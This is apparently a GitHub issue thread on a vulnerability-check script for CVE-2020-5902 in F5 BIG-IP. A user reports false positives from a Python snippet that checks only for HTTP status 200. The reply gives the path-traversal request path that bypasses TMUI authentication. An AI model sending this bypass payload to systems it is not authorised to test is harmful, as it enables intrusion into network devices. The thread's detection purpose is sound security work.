f5-bigip-rce-cve-2020-5902
f5-bigip-rce-cve-2020-5902 copied to clipboard
false positive on poc-1 part
f5BypassAuthCheckRsp1 = requests.get(tgtUrl1, headers=headers, timeout=timeout, verify=False)
if f5BypassAuthCheckRsp1.status_code == 200:
print '[POC1]' + tgtIP + ' is vulnerable-2!!!'
return True
because many of BigIP server having webpages.
Thanks your feedback! poc1 = '/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp' if you can access the authproperties.jsp page, that means could be vulnerable(possible, not 100%). So you can try it manually, or improve the code(such as improve this [if] statement) so that make it nearly 100% accurate.